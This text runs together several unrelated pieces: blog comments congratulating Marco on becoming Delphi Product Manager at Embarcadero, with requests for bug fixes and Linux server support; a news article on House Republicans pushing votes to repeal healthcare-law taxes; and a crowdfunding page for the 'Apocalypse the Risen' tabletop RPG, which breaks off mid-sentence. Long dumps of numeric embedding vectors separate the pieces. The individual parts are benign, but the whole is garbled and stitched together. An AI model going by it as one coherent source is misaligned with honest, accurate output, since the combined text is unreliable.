exist as a company? Regards, A Joining Embarcadero as Delphi Product Manager Congratulations!!! It's the best news on a very long time. Although the rumour spread since last Friday, I didn't gave much attention. I hope you can give feedback on Emb to change things and make the (once greatest) RAD tool great again. Joining Embarcadero as Delphi Product Manager Felicitaciones desde Colombia. Joining Embarcadero as Delphi Product Manager Congratulation to you marco, hope you can make some changes that all of delphi fans wishes since ages ago. There is one thing i know: - Communication, please be more communicative on what is going on with the community, right now, all delphi user never get any information on what will be planned on the next release until near the release date, well it is impossible to develop delphi only within a month or two before release right? so i'm pretty sure you have a release plan list, right now delphi still have a lot of bugs and IDE stability issues, at least please tell us what bugs is planned to be fixed. it is a start Well sorry for long comment, but i will send you an email if i've gathered more thought. Success to you, delphi and embarcadero Iwan Joining Embarcadero as Delphi Product Manager Congratulations Marco! Please fix as many bugs as possible and bring the same level of documentation as your books provide. Best Wishes. Joining Embarcadero as Delphi Product Manager Congratulazioni Marco!!! Joining Embarcadero as Delphi Product Manager CONGRATULATIONS Marco!!!!!! I am very happy for you e for this very great news! Best regards and good luck Claudio Joining Embarcadero as Delphi Product Manager Sei l'anima di Delphi, fantastica notizia. Complimenti! Joining Embarcadero as Delphi Product Manager Congratulation Marco, this a big gain for the whole Delphi community and gives me more confidence in the future of Delphi! ;-) Regards Niels Joining Embarcadero as Delphi Product Manager Congratulation Marco, this a big gain for the whole Delphi community and gives me more confidence in the future of Delphi! ;-) Regards Niels Joining Embarcadero as Delphi Product Manager Congratulations and wish you the best. Another great improvement in the Delphi climb to the top. Joining Embarcadero as Delphi Product Manager Wish you Lot of Luck & Success in a this new Adventure Marco! Compliments, B. Joining Embarcadero as Delphi Product Manager Congratulation Marco, I hope this is good news for delphi community. Joining Embarcadero as Delphi Product Manager Congratulations Marco! You have been a wonderful teacher and resource to the Delphi community for so long, I am glad you will be taking on a more official role :-) Joining Embarcadero as Delphi Product Manager Congratulation, Marco. I've used Delphi since version 1 but I've not been interested in any staff for Delphi so I didn't know who you are. Recently, I noticed that everything of Delphi is not going well. And I believe that it is time to communicate with the staff like you for the future of Delphi. Once again, all the best and congratulation! Joining Embarcadero as Delphi Product Manager Felicitaciones !!, Yo he sido usuario de Delphi no solo desde sus comienzos sino incluso desde sus precursores (empecé con Turbo Pascal a mediados de los 80s). Quiero aprovechar la invitación a aportar ideas y crítica constructiva para comentar lo siguiente: Comparto el sentimiento de muchos usuarios de que Delphi ha tomado el rumbo equivocado desde hace años Son varios los aspectos; pero, en mi caso, y pienso que en el de muchos, creo que la mayor falla es el no incluir el valor agregado más importante que, a quienes tenemos versiones empresariales, nos es más significativo : El poder compilar al menos la parte de servidor en Linux. En mi país, y, hasta donde conozco, en Latinoamérica en general, a nivel empresarial, Windows domina casi la totalidad del mercado. Por ello, tener el cliente en una plataforma Linux, no es algo atractivo para el empresario, ya que los usuarios, por la falta de un buen soporte en Linux compatible con MS-Office, requieren siempre Windows y por ello, sin importar lo bueno que hagamos un programa en Linux, no pasarán a Linux. En cambio, tener la parte de servidor Web en Linux representa un ahorro de costos muy significativo para ellos, y es el principal problema que enfrentamos cuando les llevamos nuestra solución Delphi; de hecho, en lo personal, el costo del servidor ha sido argumento para que no me dieran algunos negocios Mi petición como usuario la resumo en una línea : No actualizaré mi Delphi hasta tanto no compile al menos la parte de servidor para Linux Joining Embarcadero as Delphi Product Manager Congratulations, Marco! As someone whose first salary was for Turbo Pascal' 1.0 project, I have deep feelings about (Borland) Pascal and Delphi. I hope you can persuade the folks over there to revive the Turbo Delphi and let younger folks (and older ones like me who do not need $xxxx development product) to keep in touch with Delphi. Joining Embarcadero as Delphi Product Manager Congrats Marco in your new role at Embarcadero. I have translated below the comment posted in Spanish by Rolando. Cheers Yanniel. "Congratulations!!, I have been a Delphi user not only from its inception but even from the time of its ancestors (I began with Turbo Pascal in the middle of the 80th). I want to take advantage of your invitation in order to provide some thoughts and constructive criticism: I share the feelings of many users about Delphi taking the wrong path since many years ago. There are many aspects; but in my case, and I believe this is also the case for many others, the major failure is not include the added-value of being able to compile to Linux at least the server side code. This is the most significant aspect for those like me having business versions. In my country, and to the best of my knowledge in Latin America, Windows dominates the market in the business area. Because of that, having the client in a Linux box is not very attractive to the entrepreneur; since the users, due to the lack of a good support of MS-Office in Linux, always require Windows. Regardless of how good is our Linux application, those users won’t change to Linux. On the other hand, having the server side (Web) in Linux brings significant savings for the entrepreneurs; that’s the main problem when we offer our Delphi solution to them. As a fact, in my personal case, the server cost was the reason to lose a few business deals. My petition as a user is summarized into one line: I won’t update my Delphi IDE until it is able to compile to Linux at least the server side." Comment by Rolando on November 18, 13:38 Joining Embarcadero as Delphi Product Manager Lo importante es que Delphi vualva a ser el mejor lenguaje de programacion tanto para Win, Mac y Linux y posibilidade de crear apliaciones Web sin mucho esfuerzo sin perder la escencia de Delphi. La verdad estamos a punto de dejar este gran Lenguaje de Programacion que nos dio muy buenas satisfacciones desde la version 2.0 hasta la version 2010. Felicidades !!! esperamos noticias Gustavo Diego Ochoa Paniagua La Paz - Bolivia Joining Embarcadero as Delphi Product Manager Muchas Felicidades Marco por este nuevo proyecto y esperamos que Delphi nos de grandes sorpresas y este en todos los sistemas operativos. Saludos Juan Rendón Mazatlán México. Post Your Comment Click here for posting your feedback to this blog. There are currently 0 pending (unapproved) messages.
[ -0.053263261914253235, -0.09719385951757431, 0.055551204830408096, -0.10527621954679489, 0.007864387705922127, -0.02024575136601925, 0.025794742628932, 0.08165118098258972, -0.011028350330889225, -0.09759146720170975, -0.028264379128813744, -0.04839303717017174, 0.0007288228371180594, -0.0002887834270950407, 0.04717327281832695, 0.023234862834215164, 0.0015726680867373943, -0.04563610255718231, -0.02773227170109749, -0.03798937425017357, 0.005076191388070583, -0.10866382718086243, -0.052652280777692795, 0.008796228095889091, 0.00851260032504797, -0.009474452584981918, 0.10158073902130127, 0.02091456763446331, -0.09024617820978165, -0.07234982401132584, 0.05261080712080002, 0.004108243156224489, -0.007321852724999189, 0.019438615068793297, 0.05744018033146858, 0.02559293620288372, -0.06425624340772629, -0.013837389647960663, -0.04894176498055458, -0.011051919311285019, 0.00997769832611084, 0.001362502109259367, -0.09558594971895218, 0.029754145070910454, 0.030287403613328934, -0.008879980072379112, 0.07825541496276855, 0.053181249648332596, -0.058596089482307434, -0.04216459020972252, 0.0025974062737077475, -0.013588451780378819, -0.005163812544196844, 0.008849880658090115, -0.08324988931417465, 0.052070122212171555, 0.047803495079278946, 0.011828524991869926, -0.049383025616407394, -0.03629171475768089, 0.044159796088933945, -0.0109168766066432, 0.019715577363967896, -0.012752336449921131, -0.06375116854906082, -0.011876799166202545, -0.030102316290140152, 0.12051184475421906, -0.03966519609093666, -0.04088745266199112, 0.012484246864914894, -0.08429784327745438, -0.08311924338340759, 0.012611443176865578, 0.01823589764535427, 0.025201544165611267, 0.06057845428586006, -0.03388102352619171, 0.10853254795074463, -0.06581897288560867, 0.03850715607404709, 0.07316717505455017, -0.09722255170345306, 0.017241133376955986, 0.025332896038889885, -0.01831435039639473, -0.008198332041501999, 0.013795044273138046, 0.07502221316099167, 0.06267799437046051, 0.06514037400484085, -0.005426349118351936, -0.019523655995726585, -0.011933987028896809, 0.03176527097821236, 0.05016592517495155, 0.004665792919695377, 0.03373312950134277, 0.0005690796533599496, 0.0594470240175724, -0.05132696032524109, 0.037290602922439575, -0.014811555854976177, -0.003634621622040868, -0.16658754646778107, 0.03379752114415169, 0.008904742076992989, 0.07666890323162079, 0.10303065180778503, 0.03197791427373886, -0.057448819279670715, 0.00934580061584711, -0.07496681809425354, 0.03577527776360512, -0.05885273218154907, 0.05445140227675438, -0.047403447329998016, 0.08665022999048233, 0.08245784789323807, -0.033403947949409485, -0.0520404577255249, 0.08535230159759521, 0.00470770476385951, 0.020976757630705833, -0.01268611941486597, 0.011669845320284367, -0.018524281680583954, 3.485525890548337e-33, -0.03833768516778946, 0.02835557796061039, -0.10151621699333191, 0.10168644785881042, -0.03668053075671196, 0.07147425413131714, -0.034312326461076736, 0.09282973408699036, -0.09804760664701462, -0.024758724495768547, -0.02724596858024597, -0.012172696180641651, 0.021894343197345734, -0.016585446894168854, -0.0029976635705679655, 0.00538879306986928, 0.018035124987363815, 0.03884224221110344, -0.011541727930307388, -0.03963731601834297, -0.00539217796176672, 0.00983662623912096, -0.03371531516313553, 0.041781071573495865, 0.010082565248012543, 0.015986831858754158, -0.011956732720136642, 0.017691530287265778, 0.03393096849322319, 0.028194161131978035, -0.02857513353228569, 0.09540567547082901, -0.019408566877245903, 0.011013270355761051, 0.05142097920179367, 0.05015471950173378, -0.16036438941955566, -0.08178833872079849, 0.0009275585180148482, 0.02884439378976822, -0.07364791631698608, 0.02830461412668228, -0.06826165318489075, -0.09285356104373932, 0.020860204473137856, -0.047721851617097855, 0.05408818647265434, -0.011857742443680763, 0.048200905323028564, -0.00464099133387208, -0.009593713097274303, 0.004974058363586664, 0.06879261136054993, -0.029757773503661156, 0.02540341392159462, -0.04759512469172478, -0.01944509707391262, 0.0012697475031018257, 0.12062938511371613, -0.06403486430644989, -0.018848931416869164, 0.08659684658050537, -0.024392228573560715, 0.05283379182219505, -0.013907361775636673, 0.05613204464316368, 0.0035629370249807835, -0.02222106233239174, 0.10637819766998291, -0.047231655567884445, 0.022628286853432655, -0.024406196549534798, 0.00510176457464695, 0.03468300774693489, -0.014975701458752155, 0.0040494115091860294, -0.05244049057364464, 0.09744381904602051, 0.018309317529201508, 0.034767042845487595, 0.026123827323317528, 0.02173609659075737, -0.02365303598344326, -0.01805942691862583, 0.12290935218334198, 0.008375968784093857, 0.04237348213791847, -0.02471764199435711, 0.011905614286661148, 0.1422957330942154, -0.019639480859041214, -0.018036987632513046, -0.031407080590724945, 0.1275429129600525, 0.037112630903720856, -2.7097484754895833e-33, -0.018725547939538956, -0.09929390996694565, 0.10091586410999298, -0.1140376552939415, 0.0050540040247142315, -0.02483206056058407, -0.038560472428798676, -0.002808972494676709, 0.012546883895993233, 0.013224374502897263, 0.024254176765680313, -0.04952308163046837, -0.04297845438122749, 0.0071286605671048164, -0.04777560383081436, -0.01981634460389614, 0.07134540379047394, -0.05631576105952263, -0.01567143388092518, 0.0043449485674500465, -0.0012371818302199244, 0.03014984168112278, -0.09040986746549606, 0.029890386387705803, -0.0694020465016365, 0.05848690867424011, 0.01824035868048668, 0.008377347141504288, 0.020269766449928284, -0.037026647478342056, -0.021838687360286713, 0.0006404120358638465, -0.016539888456463814, -0.001269413623958826, -0.04552362486720085, 0.009408337995409966, -0.043370235711336136, -0.027063576504588127, 0.02802448906004429, -0.038172487169504166, 0.02868139185011387, -0.04909173771739006, -0.014249921776354313, -0.02722303569316864, -0.0020607674960047007, -0.019309673458337784, 0.05124600604176521, -0.08546807616949081, 0.02128623053431511, -0.021703612059354782, 0.05284235253930092, 0.060720045119524, -0.0016697002574801445, -0.09199342131614685, 0.01244264841079712, -0.025372985750436783, 0.06848791241645813, -0.07094679027795792, -0.0995277538895607, -0.05269412696361542, 0.03785416856408119, 0.048674583435058594, 0.07676748186349869, 0.0148927578702569, 0.03917795419692993, 0.026169458404183388, 0.07881675660610199, 0.0673663467168808, -0.021592509001493454, -0.10715193301439285, -0.045297782868146896, 0.03883199393749237, 0.00009445397154195234, -0.05320931598544121, 0.05354777351021767, -0.07156825065612793, -0.03527126461267471, -0.0072936927899718285, 0.019745072349905968, -0.025671299546957016, -0.05636977031826973, -0.046289652585983276, 0.01796543411910534, 0.05119117349386215, 0.02380695566534996, 0.06648456305265427, -0.08060842752456665, -0.02956971526145935, 0.04452124238014221, -0.07188994437456131, -0.09035549312829971, 0.021302521228790283, 0.04392823576927185, 0.0290497075766325, 0.13323794305324554, -5.066022623623212e-8, 0.01338761206716299, -0.01591874286532402, 0.01960122399032116, 0.05855443328619003, -0.028067534789443016, -0.07671055942773819, -0.11075877398252487, 0.04630619287490845, 0.014607739634811878, 0.041363149881362915, -0.06105494126677513, -0.02794618345797062, -0.061409663408994675, 0.022731838747859, 0.06877702474594116, 0.0028559258207678795, 0.03657029941678047, 0.013915649615228176, -0.014740861020982265, 0.02007994055747986, 0.046115435659885406, 0.09426939487457275, 0.06271153688430786, 0.02329641580581665, -0.0068162283860147, -0.03856491670012474, 0.005162065848708153, 0.03140850365161896, -0.014874225482344627, -0.0583370178937912, 0.009090243838727474, -0.05168759450316429, 0.01802339218556881, 0.1002250462770462, -0.002628662856295705, -0.10057569295167923, -0.008225003257393837, -0.015663539990782738, -0.0126494150608778, 0.05951911583542824, 0.028325609862804413, 0.07188761234283447, 0.05831072852015495, 0.06371648609638214, 0.007454324048012495, -0.025709260255098343, -0.025213148444890976, -0.050413962453603745, -0.05455854535102844, -0.0341087281703949, -0.040437303483486176, 0.03973874822258949, 0.01255641970783472, 0.0439273975789547, 0.00036467189784161747, 0.0036329084541648626, 0.012763798236846924, -0.013338097371160984, -0.026114966720342636, 0.053221892565488815, 0.0267169326543808, -0.11701565980911255, -0.0713132694363594, 0.009150337427854538 ]
With a Supreme Court decision on healthcare fast approaching, House Republicans are doubling down on efforts to bring attention to President Obama’s signature legislative issue. The effort, which includes votes on several measures to repeal taxes under the law, is intended to highlight unpopular aspects of the landmark bill as the presidential campaign between Obama and Republican Mitt Romney heats up. ADVERTISEMENT The House next week will consider measures to repeal taxes imposed on medical devices and over-the-counter medication. House Majority Leader Eric Cantor Eric Ivan CantorPelosi warns GOP: Next president could declare national emergency on guns Ousted GOP lawmaker David Brat named dean at Liberty University business school Trump, GOP seek to shift blame for shutdown to Pelosi MORE (R-Va.) announced the votes late last month, and called the tax on medical devices in particularly “draconian” in a memo sent to GOP lawmakers. Democrats argue the GOP effort is nakedly political and timed for the Supreme Court decision, which is expected this month. On Friday, Romney criticized Obama’s handling of the economy, arguing the nation would be creating more jobs if Obama had not focused on healthcare in 2009 and 2010. Rep. Rob Andrews (D-N.J.) – a key player in brokering deals within his party to pass the healthcare bill – called the upcoming debate a “waste of time” and said the House should be focus on legislation to create jobs. “(The timing) is probably not coincidental, I think the Republicans are trying to poison the well before the Court decision,” Andrews said in an interview with The Hill. House Republicans, who rode a wave of voter outrage into power in 2010 unfurled in part by the healthcare law, dismiss the Democratic arguments. “Well, I'm glad they are giving us that much credit in planning but obviously the medical tax bill has had a lot of bipartisan support for many weeks,” Ways and Means Chairman Dave Camp (R-Mich.) told The Hill. Only two Democrats on the Ways and Means Committee, Reps. Ron Kind Ronald (Ron) James KindSteel lobby's PR blitz can't paper over damaging effects of tariffs Congress should stop tariff power grab, bring balance to US trade policy Ocasio-Cortez sparks debate with talk of 70 percent marginal rate MORE (Wis.) and Shelly Berkley (Nev.) supported the medical device and over-the-counter drug bills at mark-up. Debate at Thursday’s lengthy mark-up provided a flavor of what to expect when the measures hit the floor mid-week. Republicans argued that the tax-repeal bills will create and save jobs in the medical device industry. Veteran Democratic lawmaker, Rep. Jim McDermott James (Jim) Adelbert McDermottLobbying World Dem lawmaker: Israel's accusations start of 'war on the American government' Dem to Trump on House floor: ‘Stop tweeting’ MORE (Wash.) scoffed at the GOP’s “job creation” argument, calling the idea “nonsense.” “It is not going to save jobs because you don't know what the impact is in fact, the evidence is that it doesn't lose jobs,” the liberal lawmaker told his colleagues.
[ -0.059940338134765625, 0.013887624256312847, 0.0938173457980156, -0.07821617275476456, 0.024994926527142525, 0.064313605427742, 0.07640067487955093, 0.04722129553556442, -0.04049850255250931, -0.020224088802933693, -0.02354114130139351, 0.19418950378894806, -0.024940814822912216, -0.05451288819313049, -0.020213132724165916, 0.043099544942379, 0.03923889994621277, 0.03937236964702606, -0.025962501764297485, 0.12762382626533508, 0.06791768223047256, 0.11312352120876312, 0.007086210418492556, 0.025081627070903778, 0.002264163689687848, 0.07715562731027603, 0.0037428962532430887, -0.07437426596879959, -0.08977611362934113, -0.03915664926171303, 0.07719973474740982, -0.07135175168514252, -0.06945811957120895, 0.037965644150972366, 0.030966011807322502, -0.0059508103877305984, -0.005917737726122141, 0.06898210197687149, -0.0021074700634926558, -0.01300698984414339, 0.028613653033971786, -0.07760392874479294, -0.08863043785095215, 0.02911670319736004, 0.019543828442692757, -0.025322798639535904, 0.018161892890930176, -0.0311217550188303, 0.0006750843022018671, 0.08264971524477005, -0.03813779354095459, 0.03160765394568443, 0.00704061146825552, 0.0030916077084839344, 0.02174607291817665, -0.0014917514054104686, -0.017834484577178955, -0.03585340455174446, -0.01968035288155079, 0.025779103860259056, 0.011365603655576706, -0.04705535247921944, 0.006191979628056288, -0.00566102983430028, -0.0038948007859289646, 0.06253062933683395, 0.013718395493924618, -0.11545267701148987, -0.017197832465171814, 0.04501862823963165, 0.03156096860766411, 0.04577944055199623, 0.05776454135775566, -0.05703214183449745, 0.03262952342629433, -0.09029578417539597, 0.01896166056394577, 0.11626973748207092, 0.11495387554168701, -0.04619215428829193, 0.0051221358589828014, -0.025270335376262665, -0.03160710260272026, -0.008679834194481373, -0.008103132247924805, -0.013579011894762516, -0.10784367471933365, -0.03893134742975235, 0.028672175481915474, -0.03319660946726799, 0.015041882172226906, -0.0411900132894516, 0.06927928328514099, -0.0426214225590229, 0.041694849729537964, 0.0029466538690030575, -0.02306690439581871, -0.07007983326911926, 0.0029668775387108326, 0.08825451135635376, -0.057827819138765335, 0.040307607501745224, 0.0009950471576303244, -0.05584074184298515, 0.013496228493750095, -0.005465172231197357, -0.011753428727388382, 0.04680156335234642, 0.02513527125120163, -0.02460302971303463, 0.04589628428220749, 0.01764628104865551, 0.019153453409671783, 0.014640708453953266, -0.050617385655641556, -0.00897615123540163, 0.09464709460735321, -0.041574589908123016, 0.009785037487745285, 0.0043665883131325245, -0.0024881341960281134, -0.008383848704397678, -0.06528933346271515, -0.040905971080064774, 0.029275061562657356, -0.00977742113173008, -0.045839425176382065, 4.938042015531205e-33, 0.04063757508993149, 0.02024172432720661, 0.06416396796703339, -0.05831460654735565, 0.026380294933915138, 0.07047531753778458, -0.018719051033258438, -0.05095541104674339, -0.009622011333703995, 0.016383813694119453, -0.09297072142362595, 0.01216352079063654, 0.014483138918876648, 0.08261259645223618, -0.043940942734479904, -0.07596331089735031, -0.08724793046712875, 0.050207674503326416, 0.038836102932691574, -0.04103159159421921, 0.03952736780047417, 0.0045900060795247555, 0.040965043008327484, 0.036447227001190186, -0.02488265186548233, -0.02133081667125225, -0.0001695667306194082, 0.017411936074495316, 0.001911353669129312, 0.0034982915967702866, 0.011557251214981079, 0.026683229953050613, 0.021357262507081032, 0.0069417329505085945, -0.027717353776097298, -0.005676440894603729, -0.03454441949725151, -0.014224816113710403, -0.024048510938882828, -0.06827127188444138, 0.048238176852464676, 0.08222846686840057, 0.05844717472791672, 0.012452557682991028, -0.010587040334939957, -0.02142513357102871, 0.099021315574646, 0.011211775243282318, -0.005398602224886417, -0.06426708400249481, 0.04781344160437584, 0.00009379396215081215, 0.04874846339225769, -0.052568141371011734, -0.09281210601329803, -0.03889472037553787, -0.10020998865365982, -0.004645031411200762, 0.03679950162768364, -0.018567750230431557, 0.07276422530412674, 0.05702085420489311, 0.009875044226646423, 0.040084391832351685, -0.06998129189014435, -0.03301326185464859, -0.01927655190229416, -0.04074789211153984, 0.0375509187579155, 0.022883668541908264, 0.09833239018917084, -0.030314745381474495, -0.018579155206680298, -0.01730208843946457, -0.04636481776833534, -0.0010321950539946556, 0.0009942855685949326, -0.043672192841768265, 0.025847693905234337, -0.03248065710067749, 0.0164297204464674, -0.08767444640398026, 0.09603423625230789, -0.011123064905405045, -0.006328687071800232, 0.02532120607793331, -0.011647915467619896, -0.05657563358545303, 0.04459191858768463, -0.03800623118877411, -0.11335726082324982, 0.03636971116065979, 0.001566415885463357, 0.00921142753213644, -0.018028264865279198, -6.187777283473566e-33, -0.11737421900033951, -0.07899746298789978, 0.010205759666860104, 0.0881519615650177, 0.03585229814052582, -0.022390222176909447, 0.0018951566889882088, -0.1097109243273735, 0.03907932713627815, -0.03137435019016266, 0.030873190611600876, 0.08023171126842499, 0.027682391926646233, -0.02004508301615715, 0.008023077622056007, -0.014915804378688335, -0.0009303737315349281, -0.08252812176942825, 0.014200697652995586, -0.01603565737605095, 0.025054261088371277, 0.14851704239845276, -0.032967742532491684, 0.13408538699150085, -0.07242470979690552, 0.025414008647203445, 0.0019798148423433304, 0.012182622216641903, 0.08248212188482285, -0.034626591950654984, -0.06514725834131241, 0.04936973750591278, -0.016642630100250244, 0.016811158508062363, 0.03482944145798683, 0.015968745574355125, -0.062186796218156815, -0.05452178046107292, -0.035796571522951126, -0.0454210564494133, 0.16711197793483734, -0.050368476659059525, -0.002521187998354435, -0.00428710225969553, 0.04748755693435669, 0.0015472101513296366, -0.023547615855932236, 0.05217467620968819, -0.025574373081326485, 0.046931471675634384, -0.06519052386283875, 0.027146419510245323, -0.02399657480418682, 0.1310640424489975, -0.027201009914278984, 0.01045153010636568, -0.004598693456500769, -0.0891772210597992, 0.0036780978552997112, 0.06213318556547165, 0.013930760324001312, -0.020311301574110985, 0.0518668070435524, -0.06705942004919052, -0.026289422065019608, -0.022887421771883965, 0.01161859929561615, -0.019269907847046852, 0.0609603114426136, -0.012528497725725174, -0.027733080089092255, -0.11032453924417496, -0.026527272537350655, -0.00160395132843405, -0.011013132520020008, 0.02618805505335331, -0.028030140325427055, -0.0026232602540403605, -0.08733445405960083, 0.040997520089149475, 0.06047961115837097, -0.14253753423690796, -0.04256948456168175, -0.044091496616601944, -0.002592178527265787, -0.023157769814133644, 0.03169645369052887, -0.02852027863264084, -0.03968765586614609, 0.0946507379412651, -0.0576179064810276, -0.07857433706521988, -0.06863012164831161, 0.003367949742823839, -0.08006416261196136, -6.544428288179915e-8, 0.09818149358034134, 0.016247285529971123, 0.04614630714058876, -0.015367588959634304, -0.02976236678659916, -0.07756610959768295, -0.03894960507750511, 0.019481457769870758, 0.004154546651989222, -0.047593120485544205, 0.10349983721971512, 0.001406766939908266, -0.0023153687361627817, -0.02913198247551918, 0.023205095902085304, 0.09654513001441956, -0.046307653188705444, 0.04051578789949417, -0.06637180596590042, -0.01790778897702694, -0.07250727713108063, 0.014849736355245113, -0.0365208201110363, 0.054535869508981705, 0.040009938180446625, 0.03737511858344078, -0.006845349911600351, 0.0680418312549591, 0.061895791441202164, 0.017651347443461418, -0.017131304368376732, 0.04662121832370758, -0.017535358667373657, 0.02169613353908062, -0.06160682812333107, -0.036430343985557556, -0.011099448427557945, -0.010028200224041939, 0.0705355778336525, 0.020518522709608078, -0.0061894566752016544, 0.00853883195668459, -0.025236645713448524, 0.00936396885663271, -0.09353812783956528, -0.11157117038965225, -0.008953706361353397, 0.010997019708156586, 0.011653561145067215, 0.010593063198029995, -0.04607848450541496, 0.03460757061839104, 0.030122797936201096, -0.04561915621161461, 0.05347413942217827, -0.0009395836386829615, -0.03215149790048599, -0.10025468468666077, -0.07578177750110626, -0.012654375284910202, 0.0798126682639122, -0.06746198982000351, 0.011172068305313587, 0.02637057565152645 ]
Apocalypse the Risen Campaign Setting is a post-apocalyptic fantasy horror RPG based on Earth, twenty-five years after the fall of society, in an event known as the Rise; when demons rose to power and the Risen dead first appeared. This game is being offered in both Dungeon and Dragons 5th Edition and Pathfinder Roleplaying Game Compatible system formats. Apocalypse the Risen thrusts you into the role of a resolute survivor, forging through the ashes of humanity on an Earth besieged by demons and the dead—known as Risen. Twenty-five years after the collapse of society, humankind and their new allies now fight back. You are a survivor of the Light battling the forces of Darkness. Players in this world take on the role of a hunter relied upon by your colony for resources and protection. You may be human or one of three other races new to Earth. Your colony is your home and responsibility, but soon you may discover the world smaller and filled with even more wonder than you could imagine. Channels cut through the ether quickly spanning great distances, shortening travel and adding to discovery. Darklands form in places of great sorrow or suffering. Supernatural energy and radiation twist and collide in great storms sweeping across the landscape. You stand against demons, Risen, mutated beasts, and desperate people who look to destroy those you love. Apocalypse the Risen Campaign Setting will be printed as a full color hardback book including detailed page layout and spot finish touches on the cover. Cover examples and spread layout mock-ups below: Cover Mock-up Option (Logo Placeholder) Cover Mock-up Option (Logo Placeholder) Leather Cover Mock-up 5E Maverick Layout - Click for Full Character Class! PF Maverick Layout - Click for Full Character Class! Click the links below for an in-depth look at the Apocalypse the Risen: “Campaign” Stretch Goals – Increased book content! Like a horde of Risen feeding on the living, the content within the Apocalypse the Risen Campaign Setting grows as these stretch goals are unlocked! Backers with this stretch goal category will receive all unlocked campaign setting content including in the book. “Adventure” Stretch Goals – From the Journal of Dr. Dobrin, from adventure hooks and places of interest, to short stories from the point of view from our iconic heroes. All unlocked stretch goals will be included in PDF layout, written from the viewpoint of renowned archeologist Dr. Nicholas Dobrin. Backers with this stretch goal category will also receive all unlocked “Social Media” Stretch Goals. “War Chest” Stretch Goals – More materials for your game session! You need every tool you can muster to help stalwart hunters battle back against the Darkness! As each stretch goal is met, backers with the “War Chest” stretch goal category will receive all unlocked scavenge maps, adventures, and more! “Social Media” Campaign: Backers with the “ Adventure ” stretch goal category gain access to the social media campaign ” stretch goal category gain access to the social media campaign Receive all unlocked “Truth Transmissions”, professionally recorded in character by post-Rise ham radio operator, “Truth.” Help grow the Rusted Portal Colony! Stretch Goals! Apocalypse the Risen Campaign Setting AtR Campaign Setting PDF (PF) - $25 AtR Campaign Setting PDF (5E) - $25 AtR Campaign Setting Print (PF) - $45 AtR Campaign Setting Print (5E) - $45 DESIGNER! Build Your Colony (5E & PF) - $50 RETAILER AtR Hardback Book x3 (5E or PF) - $90 AtR Character Sheet Pad (25 count) (PF) - $15 AtR Character Sheet Pad (25 count) (5E) - $15 AtR GM Screen - $15 Iconics - Character Builds (PF) - $15 Iconics - Character Builds (5E) - $15 Unlocked Stretch Goals 1st Level Adventure (PF or 5E) (PDF) - $10 Scavenge Map 1 (PDF) - $5 2nd Level Adventure (PF or 5E) (PDF) - $10 Scavenge Map 2 (PDF) - $5 3rd Level Adventure (PF or 5E) (PDF) - $10 Scavenge Map 3 (PDF) - $5 Journal of Nicholas Dobrin (PDF) - $15 Impact of the Rise – The events of the Rise happened suddenly. The Risen crawled from their graves all at once, millions of hungry dead seeking to feed on the living. The immediate threat forced humanity to abandon their homes and seek refuge away from population centers. Cities and communities filled with resources touched only by time. Colonies – The era of the metropolis is no more. Colonies speckle the landscape, groups fighting for survival. Some try to hide and protect what is theirs, others take what weaker colonies cannot defend, but most seek other like-minded colonies for trade and support. Resources – Earth after the Rise has no need for cash, jewels, or precious metals. In Apocalypse the Risen, the people of Earth have identified three primary forms of currency: Combustible, Consumable, and Mechanical resources. These resources are used in trade and used in the building and fueling of the limited technology of the world. Post-Rise Lifestyle – Technology is not what it used to be and pre-Rise gear is tough to acquire. For most of the last twenty-five years humanity has been fighting for survival, carving out a new place in the hierarchy of the world. Weapons, armor, and a variety of equipment comes with modification options. Special Materials – Influenced by Supernatural energy, ancient metallurgy, post-Rise ingenuity, or otherworldly sources, below are some examples of Apocalypse the Risen materials. Some examples below. Meteoric Iron – Iron from meteors collected Supernatural energy when outside the magically suppressed Earth. Since the Seals were broken, this energy has awoken making an extremely hard and durable metal for weapons and armor. Dark Steel – Metal deposits mined in Supernatural infused Darklands has taken on near magical properties with dangers. Diamond Steel – Taking a page from modern drilling techniques and an abundance of diamonds with little post-Rise value, Diamond Steel makes for extremely sharp blades. Antiquity Bronze – Relics and Artifacts from ancient times, antiquity bronze weapons and armor provide unique properties since the breaking of the Seals. Humans - Humanities ability to adapt and overcome is at the forefront of the design. Traits: Skilled and Stalwart Descended - Fallen angels hailing from one of three separate angelic banners, each providing different physical traits and abilities as they advance in level. Banners: Serephim (halo and wings of fire) Cherubim (halo of light and feathered wings) Throne (halo and wings of gold) Progeny - Half-demons from one of seven unique sin nature sub-types, each providing different abilities and hindrances. Additionally, the race selects from a variety of physical characteristics. Sin nature traits: Lust: Pheromones & Erratic Gluttony: Binge & Compulsive Greed: Drain & Treacherous Sloth: Good Enough & Procrastinating Wrath: Vengeful Strike & Vindictive Envy: Covet & Shrewd/Malicious Pride: Hubris & Arrogant Lazarus - Free spirits escaped from Purgatory and taken physical form on Earth. This race holds distant memories and a connection to the supernatural. Traits: Tortured Souls, Distant Memories, Supernatural Bonds, Spell Selection Arbiter – The Arbiter is the ultimate warrior of faith and unquestioned hand of justice in a world with no clear right and wrong. They stand alone as judge, jury, and frequently executioner both within the colony and abroad. The Arbiter is driven by an inner sense of justice and a burning faith to eradicate undead and demonic entities. Conservator – Sacred Earth protector, the Conservator is dedicated to setting straight the natural order in a world gone wrong. By tapping into natural pathways of power, the Conservator becomes a conduit for energies flowing through ley lines. Nature’s hidden powerlines, ley lines connect nodes sites such as cairns, standing stones, and megalithic circles. As the Conservator becomes more skilled they learn to create their own powerful site in this energy network. They believes that the the hordes of undead are an affront to nature's order and that Darklands disrupt the natural flow of energies. The Conservator is more wasteland environmentalist than traditional druid. Enforcer – The Enforcer is a hardened killer, forged in the madness of the world after the rise and molded from a keen sense of survival. Enforcers are skilled in the most immediate implement of death at hand. Where other warriors have refined combat skills or enhanced reactions, the Enforcer simply does whatever it takes in battle. Their tactics are often brutal and inherently violent, but in the end their goal is singular. Survive at all costs. Harbinger – A mystic of body and mind, the Harbinger is a practitioner of intense mental discipline, striving to balance logic and emotion. By opening their mind’s eye through a process known as a Mystic Slip, the Harbinger wields turbulent raw Supernatural energy. Channeling these tainted powers is only limited by the time allotted with a Mystic Slip, though casting individual spells beyond the limits of their mind risks insanity. This class is also a practitioner of other mental disciplines. Harbingers are often viewed as strange, frequently misunderstood even among friends. Regardless, the Harbinger is respected for their heightened awareness and unique powers. Hound – The ultimate self-reliant survivor, experienced in living off the land. The Hound hails from military stock, outdoor enthusiasts, hunters, and those regarding nature as something to be understood and respected. They are skilled in stealth, stalking, movement in combat, and survival. The Hound becomes a very versatile combat class. Jackal – Jackals are the ultimate scroungers. Not only are they able to quickly and quietly move in and out of 